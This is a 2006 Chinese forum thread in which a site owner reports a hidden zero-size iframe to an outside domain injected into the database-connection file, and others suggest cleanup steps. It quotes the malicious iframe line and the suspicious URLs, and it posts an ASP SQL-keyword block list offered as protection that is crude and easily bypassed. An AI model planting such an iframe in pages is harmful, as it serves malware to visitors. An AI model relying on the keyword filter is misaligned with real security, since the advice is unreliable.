28,391
社区成员
发帖
与我相关
我的任务
分享
...全文
请发表友善的回复…
发表回复
zpyzhupai 2006-12-20
- 打赏
- 举报
谢谢各位哈!
什么都不能 2006-12-20
- 打赏
- 举报
站点是否有图片上传之类的功能,最好不要使用此类上传
什么都不能 2006-12-20
- 打赏
- 举报
<%
dim sql_injdata
SQL_injdata="'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare
SQL_inj=split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write"<Script Language=javascript> alert('系统提示:\n请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write"<Script Language=""javascript"">alert('系统提示:\n请不要在参数中包含非法字符尝试注入!\n');history.back()</Script>"
Response.end
end if
next
next
end if
%>
将以上代码放入inc/conn.asp文件中
dim sql_injdata
SQL_injdata="'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare
SQL_inj=split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write"<Script Language=javascript> alert('系统提示:\n请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write"<Script Language=""javascript"">alert('系统提示:\n请不要在参数中包含非法字符尝试注入!\n');history.back()</Script>"
Response.end
end if
next
next
end if
%>
将以上代码放入inc/conn.asp文件中
pingaigh 2006-12-09
- 打赏
- 举报
恩.看你急得..是我干的..^=^ 下次不敢了.
zpyzhupai 2006-12-09
- 打赏
- 举报
发现了iframe src=http://bluewell.com.cn/ads/ width=0 height=0 frameborder=0></iframe>
这个代码写到了连接数据库的文件中,导致很多页面都出现这个问题
请问怎样检查这个漏洞,怎样防范再受到攻击?
这个代码写到了连接数据库的文件中,导致很多页面都出现这个问题
请问怎样检查这个漏洞,怎样防范再受到攻击?
cfstudio 2006-12-09
- 打赏
- 举报
发现了就删除掉啊。
我打开首页时,检测到两个站外的非法连接~
我打开首页时,检测到两个站外的非法连接~
cfstudio 2006-12-09
- 打赏
- 举报
留意:
http://bluewell.com.cn/ads.....
还有:
http://wshadow.com/hei/.....
自己在源码里面查找下吧。
用DW,使用搜索文件夹功能,把所有的网页源码都搜索看看。
关键字就用上面的吧。
如果没有的话,像楼上说的,留意下框架或者js文件。可能是广告木马。
在本地也杀下毒吧。
http://bluewell.com.cn/ads.....
还有:
http://wshadow.com/hei/.....
自己在源码里面查找下吧。
用DW,使用搜索文件夹功能,把所有的网页源码都搜索看看。
关键字就用上面的吧。
如果没有的话,像楼上说的,留意下框架或者js文件。可能是广告木马。
在本地也杀下毒吧。
zpyzhupai 2006-12-09
- 打赏
- 举报
在有的页面发现了如下代码<iframe src=http://bluewell.com.cn/ads/ width=0 height=0 frameborder=0></iframe>这是被人家添加的,怎么搞定?谢谢!
anwell 2006-12-09
- 打赏
- 举报
有的虚拟主机提供商安全方面也设置的不好,被跨站注入了.
anwell 2006-12-09
- 打赏
- 举报
呵呵
什么都不能 2006-12-09
- 打赏
- 举报
我不懂,建议先去买几本书学习下。然后再去找极品高手去请教。
xiemate 2006-12-09
- 打赏
- 举报
查看所有与首页相联的文件.看里面是滞有框架..或可疑代理连接到别的网站上
pxiaoli 2006-12-09
- 打赏
- 举报
自卫反击敌胆汗
zpyzhupai 2006-12-09
- 打赏
- 举报
自己顶一下,希望高手指点!
cink 2006-12-04
- 打赏
- 举报
被人家放了 网页木马 估计是程序BUG 请先去处代码
加QQ147031
加QQ147031
lymyx 2006-12-04
- 打赏
- 举报
有漏洞,程序本身存在错误,上传等、。
zpyzhupai 2006-12-04
- 打赏
- 举报
谢谢各位的指点哈,不过我还是不明白怎么去处理这个问题,空间是买的,网站是通过ftp工具上传上去的,能否详细说明怎样去处理呢?
hbjmdx008 2006-12-03
- 打赏
- 举报
Trojan.DL.VBS.Agent.cfw
杀毒。
杀毒。
Atai-Lu 2006-12-03
- 打赏
- 举报
解决的方式通常只有一种,就是检查漏洞,程序的,服务器的,看看是哪个漏洞被别人利用了,然后修补上.
zpyzhupai 2006-12-03
- 打赏
- 举报
急,请高手帮忙哈,空间是租用的
